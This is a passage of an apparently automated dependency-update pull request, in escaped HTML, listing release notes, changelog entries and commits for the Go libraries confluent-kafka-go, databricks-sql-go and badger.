(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/blob/master/CHANGELOG.md\"\u003egithub.com/confluentinc/confluent-kafka-go/v2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBundle prebuilt binaries for linux-s390x (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/5365\"\u003e#5365\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.1, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.1\"\u003elibrdkafka v2.14.1 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release:\u003c/p\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Azure User-Assigned Managed Identity (UAMI) authentication in Schema Registry client\u003c/li\u003e\n\u003cli\u003eAdd AssociatedNameStrategy (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1515\"\u003e#1515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd enableAt to RuleSet (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1530\"\u003e#1530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDereference map ptrs for data quality rules (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1532\"\u003e#1532\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.0, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.0\"\u003elibrdkafka v2.14.0 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.3\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow compatibility with librdkafka 2.13.0+ (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1524\"\u003e#1524\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.13.2\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow Azure KMS key version to be optional (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1503\"\u003e#1503\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eschemaregistry/rules/encryption: fix dropped errors (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1512\"\u003e#1512\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate frozen semantics for associations in mock SR client (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1514\"\u003e#1514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.13.2, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.13.2\"\u003elibrdkafka v2.13.2 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/a66372dced3f540bfac02fec247adce7ab8a3ba8\"\u003e\u003ccode\u003ea66372d\u003c/code\u003e\u003c/a\u003e Import v2.14.1 (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1538\"\u003e#1538\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/4655d16aad4a3b3a85977b508ae80c65536da396\"\u003e\u003ccode\u003e4655d16\u003c/code\u003e\u003c/a\u003e Revert docker_aws_lambda_example go.sum\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/35eb1a8343dd92eeb7901be5246135362dd9a418\"\u003e\u003ccode\u003e35eb1a8\u003c/code\u003e\u003c/a\u003e Documentation and error code update for librdkafka v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/4ea2d93de96159f7f30d687d5b93b6714b988e98\"\u003e\u003ccode\u003e4ea2d93\u003c/code\u003e\u003c/a\u003e librdkafka static bundle v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/8ff80a5dc8fa32e9c26cd26a3c87ea600f720b70\"\u003e\u003ccode\u003e8ff80a5\u003c/code\u003e\u003c/a\u003e librdkafka and confluent-kafka-go version v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/054636bcbe4fb92e0fa333d2ed7010b20d09279a\"\u003e\u003ccode\u003e054636b\u003c/code\u003e\u003c/a\u003e Import v2.14.1-RC1 (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1537\"\u003e#1537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/b255e91d4dc6be5030b661bfb034bf0577faffed\"\u003e\u003ccode\u003eb255e91\u003c/code\u003e\u003c/a\u003e Fix CHANGELOG version to v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/0c3351dfd6841eeac9a60a1e417082e41c46924e\"\u003e\u003ccode\u003e0c3351d\u003c/code\u003e\u003c/a\u003e Documentation and error code update for librdkafka v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/cd50a1cd708089601065441b50e5682cf1c5fd51\"\u003e\u003ccode\u003ecd50a1c\u003c/code\u003e\u003c/a\u003e librdkafka static bundle v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/34041a94255f59fdf6e16f4af7c2c85574797520\"\u003e\u003ccode\u003e34041a9\u003c/code\u003e\u003c/a\u003e librdkafka and confluent-kafka-go version v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/compare/v2.8.0...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/databricks/databricks-sql-go` from 1.7.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/databricks/databricks-sql-go/releases\"\u003egithub.com/databricks/databricks-sql-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#320\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/321\"\u003e#321\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/322\"\u003e#322\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/349\"\u003e#349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd SPOG (Custom URL) routing support via \u003ccode\u003ex-databricks-org-id\u003c/code\u003e\u003ccode\u003edatabricks/databricks-sql-go#347\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#341\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#326\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#351\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#325\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.10.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#290\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/291\"\u003e#291\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#297\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/304\"\u003e#304\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/305\"\u003e#305\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/311\"\u003e#311\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/319\"\u003e#319\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#316\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#295\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#308\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#286\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.9.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for query tags\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#283\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.8.0...v1.9.0\"\u003ehttps://github.com/databricks/databricks-sql-go/compare/v1.8.0...v1.9.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.8.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure thrift field IDs stay within range by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/276\"\u003edatabricks/databricks-sql-go#276\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd Arrow IPC stream iterator for direct access to Arrow buffer by \u003ca href=\"https://github.com/jadewang-db\"\u003e\u003ccode\u003e@​jadewang-db\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/279\"\u003edatabricks/databricks-sql-go#279\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for v1.8.0 release by \u003ca href=\"https://github.com/jadewang-db\"\u003e\u003ccode\u003e@​jadewang-db\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/280\"\u003edatabricks/databricks-sql-go#280\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jadewang-db\"\u003e\u003ccode\u003e@​jadewang-db\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/279\"\u003edatabricks/databricks-sql-go#279\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.7.1...v1.8.0\"\u003ehttps://github.com/databricks/databricks-sql-go/compare/v1.7.1...v1.8.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.7.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix critical CVE-2024-45337 by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/264\"\u003edatabricks/databricks-sql-go#264\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd nil handling for isStagingOperation to handle older DBR versions by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/266\"\u003edatabricks/databricks-sql-go#266\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[PECOBLR-402] Update thrift client library after cleaning up unused fields and structs by \u003ca href=\"https://github.com/gopalldb\"\u003e\u003ccode\u003e@​gopalldb\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/268\"\u003edatabricks/databricks-sql-go#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd schema to ArrowBatchIterator by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/267\"\u003edatabricks/databricks-sql-go#267\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gopalldb\"\u003e\u003ccode\u003e@​gopalldb\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/268\"\u003edatabricks/databricks-sql-go#268\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.7.0...v1.7.1\"\u003ehttps://github.com/databricks/databricks-sql-go/compare/v1.7.0...v1.7.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/databricks/databricks-sql-go/blob/main/CHANGELOG.md\"\u003egithub.com/databricks/databricks-sql-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.11.0 (2026-04-16)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#320\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/321\"\u003e#321\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/322\"\u003e#322\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/349\"\u003e#349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd SPOG (Custom URL) routing support via \u003ccode\u003ex-databricks-org-id\u003c/code\u003e\u003ccode\u003edatabricks/databricks-sql-go#347\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#341\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#326\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#351\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#325\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.10.0 (2026-02-19)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#290\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/291\"\u003e#291\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#297\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/304\"\u003e#304\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/305\"\u003e#305\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/311\"\u003e#311\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/319\"\u003e#319\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#316\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#295\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#308\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#286\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.9.0 (2025-09-17)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for query tags\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#283\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.8.0 (2025-07-24)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Arrow IPC Iterator\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.7.1 (2025-05-20)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#267\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#268\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#266\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#264\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/f4d99924f71c94faffaa896ce8c3e427b303fb7b\"\u003e\u003ccode\u003ef4d9992\u003c/code\u003e\u003c/a\u003e Prepare for v1.11.0 release (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/352\"\u003e#352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/12c3f2a89f74b92842ed24836b326defba36143d\"\u003e\u003ccode\u003e12c3f2a\u003c/code\u003e\u003c/a\u003e Add SPOG (Custom URL) routing support via x-databricks-org-id header (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/3c0f7e41f3ba1f1feff6b6f508eb527690706181\"\u003e\u003ccode\u003e3c0f7e4\u003c/code\u003e\u003c/a\u003e [ES-1804970] Fix CloudFetch returning stale column names from cached results ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/305e3bc8de47034d3e144e3c34d03c4abaf7a04c\"\u003e\u003ccode\u003e305e3bc\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Add enforceEmbeddedSchemaCorrectness to TExecuteStatementReq (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/344\"\u003e#344\u003c/a\u003e)\u0026quot; ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/3f115aabd2b3f239c6d0f6eaa2d66a5e8e61791d\"\u003e\u003ccode\u003e3f115aa\u003c/code\u003e\u003c/a\u003e Add enforceEmbeddedSchemaCorrectness to TExecuteStatementReq (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/f0487d13339c85f1669ebe26c6eac78ce306e713\"\u003e\u003ccode\u003ef0487d1\u003c/code\u003e\u003c/a\u003e Enable telemetry by default with DSN-controlled priority and full event corre...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/4faa786f87c87f1941a3ef2b9c3edecdf125e8f5\"\u003e\u003ccode\u003e4faa786\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.3.1 to 6.0.2 (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/333\"\u003e#333\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/73b3f3fc6c8873850db030a71f12a4f932b1ad41\"\u003e\u003ccode\u003e73b3f3f\u003c/code\u003e\u003c/a\u003e Bump actions/cache from 4.3.0 to 5.0.4 (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/335\"\u003e#335\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/ea861a01da7719d3e170990d69fc399468101d27\"\u003e\u003ccode\u003eea861a0\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5.6.0 to 6.4.0 (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/342\"\u003e#342\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/dbce21ae387b552247507646b0d2a4ca26281b6b\"\u003e\u003ccode\u003edbce21a\u003c/code\u003e\u003c/a\u003e Move CI to Databricks protected runners with JFrog OIDC (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.7.0...v1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/dgraph-io/badger/v4` from 4.7.0 to 4.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/dgraph-io/badger/releases\"\u003egithub.com/dgraph-io/badger/v4's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.9.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(aix): add aix directory synchronization support by \u003ca href=\"https://github.com/pmur\"\u003e\u003ccode\u003e@​pmur\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2115\"\u003edgraph-io/badger#2115\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: correct the comment on value size in skl.node by \u003ca href=\"https://github.com/ahrtr\"\u003e\u003ccode\u003e@​ahrtr\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2250\"\u003edgraph-io/badger#2250\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: Update changelog by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2256\"\u003edgraph-io/badger#2256\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): update arm runner label by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2248\"\u003edgraph-io/badger#2248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: add checksum tests for package y by \u003ca href=\"https://github.com/miladev95\"\u003e\u003ccode\u003e@​miladev95\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2246\"\u003edgraph-io/badger#2246\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ahrtr\"\u003e\u003ccode\u003e@​ahrtr\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2250\"\u003edgraph-io/badger#2250\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/miladev95\"\u003e\u003ccode\u003e@​miladev95\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2246\"\u003edgraph-io/badger#2246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pmur\"\u003e\u003ccode\u003e@​pmur\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2115\"\u003edgraph-io/badger#2115\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/dgraph-io/badger/compare/v4.9.0...v4.9.1\"\u003ehttps://github.com/dgraph-io/badger/compare/v4.9.0...v4.9.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.9.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(docs): fix typos by \u003ca href=\"https://github.com/kianmeng\"\u003e\u003ccode\u003e@​kianmeng\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2227\"\u003edgraph-io/badger#2227\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(y): shall always return empty slice rather than nil by \u003ca href=\"https://github.com/kooltuoehias\"\u003e\u003ccode\u003e@​kooltuoehias\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2245\"\u003edgraph-io/badger#2245\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: test.sh error by \u003ca href=\"https://github.com/kianmeng\"\u003e\u003ccode\u003e@​kianmeng\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2225\"\u003edgraph-io/badger#2225\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: typo of abandoned by \u003ca href=\"https://github.com/jas4711\"\u003e\u003ccode\u003e@​jas4711\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2222\"\u003edgraph-io/badger#2222\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update go minor and patch by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2212\"\u003edgraph-io/badger#2212\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update dependency node to v22 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2219\"\u003edgraph-io/badger#2219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update the trunk conf file by \u003ca href=\"https://github.com/matthewmcneely\"\u003e\u003ccode\u003e@​matthewmcneely\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2217\"\u003edgraph-io/badger#2217\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update go minor and patch by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/dgraph-io/badger/pull/2218\"\u003edgraph-io/badger#2218\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): Update actions/checkout 